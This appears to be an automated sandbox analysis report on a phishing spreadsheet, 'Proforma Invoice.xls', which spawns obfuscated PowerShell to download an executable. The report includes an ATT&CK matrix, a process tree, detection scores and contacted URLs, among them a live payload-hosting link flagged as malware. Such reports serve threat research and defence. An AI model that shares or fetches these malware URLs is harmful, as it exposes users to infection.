Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Command and Scripting Interpreter1 | DLL Side-Loading1 | Process Injection11 | Masquerading1 | OS Credential Dumping | Security Software Discovery11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting32 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution13 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion3 | Security Account Manager | Process Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | PowerShell1 | Logon Script (Mac) | Logon Script (Mac) | Process Injection11 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting32 | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | System Information Discovery12 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

Behavior Graph

[Behavior graph rendered as an image in the original; the recoverable data follows.]

Behavior Graph ID: 320373
Sample: Proforma Invoice.xls
Start date: 19/11/2020
Architecture: WINDOWS
Score: 92

Top-level signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 6 other signatures

Process tree:
  EXCEL.EXE (dropped C:\Users\user\...\Proforma Invoice.xls.LNK; Obfuscated command line found; Document exploit detected (process start blacklist hit))
    cmd.exe (Obfuscated command line found) -> powershell.exe, conhost.exe
    cmd.exe -> powershell.exe, conhost.exe
    cmd.exe -> powershell.exe, conhost.exe

Network (from powershell.exe): cutt.ly 104.22.1.232, port 443 (CLOUDFLARENETUS, United States); shopphongtinh.com 202.92.6.10, port 443 (VNPT-AS-VNVNPTCorpVN, Viet Nam)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
Proforma Invoice.xls | 14% | Virustotal | | Browse
Proforma Invoice.xls | 21% | ReversingLabs | Document-Word.Downloader.Powdow |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
cutt.ly | 1% | Virustotal | | Browse
shopphongtinh.com | 5% | Virustotal | | Browse

URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cutt.ly | 104.22.1.232 | true | true | | unknown
shopphongtinh.com | 202.92.6.10 | true | false | | unknown

URLs from Memory and Binaries

                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                      high
                                      https://cr.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                        high
                                        https://shopphongtinh.com4powershell.exe, 00000006.00000002.386277042.0000000004987000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cutt.ly/ZhqUH1OPowerShell_transcript.581804.sxhBoU5o.20201119100421.txt.6.drtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://portal.office.com/account/?ref=ClientMeControl858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.385123620.0000000004721000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.411599928.0000000004721000.00000004.00000001.sdmpfalse
                                            high
                                            https://ecs.office.com/config/v2/Office858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                              high
                                              https://graph.ppe.windows.net858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.411829647.0000000004863000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.383638755.0000000007DB1000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://wus2-000.pagecontentsync.858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.411829647.0000000004863000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.383638755.0000000007DB1000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                            high
                                                            https://store.officeppe.com/addinstemplate858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dev0-api.acompli.net/autodetect858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.ms858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.powerbi.com/v1.0/myorg/groups858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                              high
                                                              https://web.microsoftstream.com/video/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                high
                                                                https://graph.windows.net858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                  high
                                                                  https://dataservice.o365filtering.com/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.411829647.0000000004863000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.383638755.0000000007DB1000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://officesetup.getmicrosoftkey.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://analysis.windows.net/powerbi/api858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                      high
                                                                      https://prod-global-autodetect.acompli.net/autodetect858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://outlook.office365.com/autodiscover/autodiscover.json858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                        high
                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                          high
                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                            high
                                                                            http://crl.micropowershell.exe, 00000009.00000003.430528579.00000000095CD000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                              high
                                                                              http://crl.microsofpowershell.exe, 00000006.00000003.274685863.0000000007514000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                high
                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                  high
                                                                                  http://weather.service.msn.com/data.aspx858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                    high
                                                                                    https://apis.live.net/v5.0/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                      high
                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                        high
                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                          high
                                                                                          https://management.azure.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                              high
                                                                                              https://incidents.diagnostics.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                high
                                                                                                https://clients.config.office.net/user/v1.0/ios858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                  high
                                                                                                  https://insertmedia.bing.office.net/odc/insertmedia858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                    high
                                                                                                    https://o365auditrealtimeingestion.manage.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                      high
                                                                                                      https://outlook.office365.com/api/v1.0/me/Activities858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                        high
                                                                                                        https://api.office.net858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                          high
                                                                                                          https://incidents.diagnosticssdf.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                            high
                                                                                                            https://asgsmsproxyapi.azurewebsites.net/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://clients.config.office.net/user/v1.0/android/policies858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                              high
                                                                                                              https://cutt.lypowershell.exe, 00000006.00000003.376490691.0000000008D79000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.385597645.0000000004863000.00000004.00000001.sdmptrue
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://entitlement.diagnostics.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                high
                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                  high
                                                                                                                  https://shopphongtinh.com/Ubnccbruoun7.exepowershell.exe, 00000006.00000002.386239949.0000000004983000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.386277042.0000000004987000.00000004.00000001.sdmptrue
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  https://autodiscover-s.outlook.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                    high
                                                                                                                    https://storage.live.com/clientlogs/uploadlocation858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                      high
                                                                                                                      https://templatelogging.office.com/client/log858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                          high
                                                                                                                          http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0Lpowershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://crl.microsoft.copowershell.exe, 00000008.00000003.380298000.0000000008CAD000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://management.azure.com/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                              high
                                                                                                                              https://ncus-000.contentsync.858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://login.windows.net/common/oauth2/authorize858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/imports858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                            high
